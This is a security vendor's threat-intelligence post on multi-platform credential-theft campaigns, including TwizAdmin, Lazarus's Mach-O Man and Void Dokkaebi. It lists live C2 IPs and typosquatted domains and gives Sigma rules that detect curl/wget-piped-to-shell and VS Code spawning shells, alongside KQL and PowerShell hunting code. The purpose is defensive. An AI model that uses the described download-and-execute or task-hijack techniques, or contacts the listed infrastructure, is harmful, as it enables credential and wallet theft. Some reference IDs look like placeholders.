Back to Intelligence

TwizAdmin Infostealer, Lazarus Mach-O Man & Void Dokkaebi: Multi-Platform Credential Theft Surge

SA
Security Arsenal Team
April 23, 2026
5 min read

Recent OTX pulses indicate a surge in sophisticated, multi-platform credential theft and financial fraud operations. Threat actors including the Lazarus Group, Void Dokkaebi (Famous Chollima), and the Russian-speaking DataBreachPlus collective are actively leveraging diverse initial access vectors—ranging from "ClickFix" social engineering and supply chain repository poisoning to fake job interviews—to deploy information stealers and crypto-drainers. The collective objective is financial theft via cryptocurrency wallet draining (TwizAdmin, StepDrainer) and espionage via browser credential exfiltration (Mach-O Man, BeaverTail). These campaigns demonstrate a high operational maturity, utilizing FastAPI-based C2 panels, malicious VS Code extensions, and typosquatted domains to evade detection.

Threat Actor / Malware Profile

  • TwizAdmin (DataBreachPlus): A multi-stage, multi-platform malware (Windows/macOS) featuring a cryptocurrency clipboard hijacker supporting eight chains, BIP-39 seed phrase theft, and a ransomware module (crpx0). It communicates via a FastAPI-based C2 panel observed at 103.241.66[.]238:1337 and uses license key systems. Distribution relies heavily on social engineering lures impersonating logistics (FedEx).
  • Mach-O Man (Lazarus Group): A macOS-specific malware kit deployed via ClickFix attacks. The campaign starts with fake meeting invites on Telegram, redirecting users to typosquatted collaboration domains (e.g., livemicrosft.com). It tricks users into executing terminal commands that install the payload, which steals browser data and exfiltrates it via Telegram.
  • Void Dokkaebi (Famous Chollima): A North Korea-aligned group evolving into a self-propagating supply chain threat. They use fake job interviews to lure developers into cloning poisoned Git repositories. Malicious VS Code task configurations execute payloads like DEV#POPPER RAT, BeaverTail, and InvisibleFerret, turning the developer's environment into a propagation vector.
  • StepDrainer: A Malware-as-a-Service (MaaS) platform targeting over 20 blockchain networks. It focuses on automated asset theft by abusing ERC-20 token permissions and NFT approval mechanisms, often distributed via phishing pages mimicking blockchain explorers.

IOC Analysis

The provided IOCs span multiple infrastructure types essential for C2 communication and payload delivery:

  • Network Infrastructure: Key C2 IPs include 31.31.198.206 (TwizAdmin) and 166.88.4.2 (Void Dokkaebi). Domains feature typosquatting tactics (livemicrosft.com) and dynamic DNS used in crypto drainers (bull-run.fun, scanclaw.live).
  • File Artifacts: A significant list of SHA256 and MD5 hashes corresponding to the malware payloads for TwizAdmin, Mach-O Man, and the macOS ClickFix campaigns.
  • Operationalization: SOC teams should immediately block the listed domains at the DNS layer and IPs at the firewall. The file hashes must be ingested into EDR solutions for retrospective hunting. The presence of typosquatted domains suggests a need for enhanced DNS security filters capable of detecting visual similarity attacks.

Detection Engineering

YAML
---
title: Potential TwizAdmin C2 Communication
id: a1b2c3d4-5678-90ab-cdef-1234567890ab
description: Detects network connections to known TwizAdmin C2 infrastructure IP addresses and ports.
status: experimental
author: Security Arsenal
date: 2026/04/23
references:
    - https://otx.alienvault.com/pulse/66666666
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: zeek
    service: conn
detection:
    selection_ip:
        id.resp_h:
            - '31.31.198.206'
            - '103.241.66.238'
    selection_port:
        id.resp_p: 1337
    condition: 1 of selection*
falsepositives:
    - Legitimate traffic to shared hosting IPs
level: high
---
title: Suspicious macOS ClickFix Terminal Execution
id: b2c3d4e5-6789-01bc-def2-2345678901bc
description: Detects potential ClickFix activity where a shell script is downloaded via curl/wget and piped directly to bash/sh.
status: experimental
author: Security Arsenal
date: 2026/04/23
references:
    - https://otx.alienvault.com/pulse/77777777
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: macos
    category: process_creation
detection:
    selection_img:
        Image|endswith:
            - '/bin/bash'
            - '/bin/sh'
            - '/bin/zsh'
    selection_cli:
        CommandLine|contains:
            - 'curl '
            - 'wget '
    selection_pipe:
        CommandLine|contains:
            - ' | '
            - ' |sh'
            - ' |bash'
    condition: all of selection_*
falsepositives:
    - Legitimate developer tools or installation scripts
level: medium
---
title: VS Code Task Exploitation via Suspicious Child Process
id: c3d4e5f6-7890-12cd-ef34-3456789012cd
description: Detects exploitation of VS Code tasks where Code.exe spawns a shell or script to execute potential malware payloads.
status: experimental
author: Security Arsenal
date: 2026/04/23
references:
    - https://otx.alienvault.com/pulse/88888888
tags:
    - attack.execution
    - attack.t1204.002
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|endswith: '\Code.exe'
    selection_img:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\pwsh.exe'
            - '\node.exe'
            - '\python.exe'
    selection_cli:
        CommandLine|contains:
            - 'npm'
            - 'python'
            - 'node'
            - 'bash'
    condition: all of selection_*
falsepositives:
    - Legitimate developer build tasks
level: low


kql
// Hunt for network connections to known C2 infrastructure and typosquatted domains
DeviceNetworkEvents
| where RemoteIP in ("31.31.198.206", "103.241.66.238", "166.88.4.2", "85.239.62.36", "172.94.9.250") 
   or RemoteUrl has_any ("fanonlyatn.xyz", "livemicrosft.com", "bull-run.fun", "spot-wave.fun", "moonscan.live")
| extend Timestamp = TimeGenerated, DeviceName = DeviceName, AccountName = InitiatingProcessAccountName, RemoteIP = RemoteIP, URL = RemoteUrl
| project Timestamp, DeviceName, AccountName, RemoteIP, URL, RemotePort
| order by Timestamp desc


powershell
# PowerShell IOC Hunt Script for TwizAdmin and ClickFix Indicators
$MaliciousHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9",
    "e12285f507c847b986233991b86b22e3"
)

Write-Host "Scanning for known malicious file hashes (This may take time)..." -ForegroundColor Cyan

# Scan C drive for matching hashes
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { !$_.PSIsContainer -and $_.Length -gt 0 } |
    ForEach-Object {
        try {
            $hash = Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction Stop
            if ($hash.Hash -in $MaliciousHashes) {
                Write-Host "[!] MALICIOUS FILE DETECTED: $($_.FullName)" -ForegroundColor Red
                Write-Host "    Hash: $($hash.Hash)" -ForegroundColor DarkRed
            }
        } catch {
            # Ignore access errors
        }
    }

# Check for active network connections to malicious IPs
$MaliciousIPs = @("31.31.198.206", "103.241.66.238", "166.88.4.2", "172.94.9.250")
Write-Host "Checking for active connections to known C2 IPs..." -ForegroundColor Cyan

Get-NetTCPConnection | Where-Object { $MaliciousIPs -contains $_.RemoteAddress } | 
    Select-Object LocalAddress, RemoteAddress, State, @{Name="Process";Expression={(Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName}}

Response Priorities

  • Immediate: Block all listed IP addresses and domains at the firewall and proxy levels. Initiate a scan for the provided SHA256 file hashes across all endpoints.
  • 24h: Conduct a credential audit and force password resets for accounts associated with the targeted Technology and Finance sectors, particularly for developers and users of cryptocurrency wallets.
  • 1 Week: Review and harden CI/CD pipelines against repository poisoning. Implement application control policies to restrict VS Code from spawning unauthorized child processes and educate users on ClickFix social engineering tactics.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialstwizadminlazarus-groupvoid-dokkaebistepdrainerclickfix

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action